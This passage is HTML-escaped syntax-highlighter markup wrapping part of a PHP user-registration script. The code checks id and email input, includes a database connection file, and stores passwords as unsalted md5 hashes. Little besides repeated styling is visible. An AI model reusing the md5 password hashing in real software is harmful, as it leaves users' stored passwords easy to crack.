rgb(221, 17, 68) !important;&quot;&gt;&quot;id too short&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-55&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strlen&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$uid&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;16&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;id too long&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-56&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;!&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;ctype_alnum&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$uid&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;id must be alnum!&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-57&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strlen&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$umail&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;256&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;email too long&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-58&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;include&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;dbconn.php&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-59&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$upw&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;md5&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$upw&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-60&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$uip&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$_SERVER&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'REMOTE_ADDR'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-61&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbGetPath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;member_&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$uid&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;id already existed&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-62&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$ret&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; 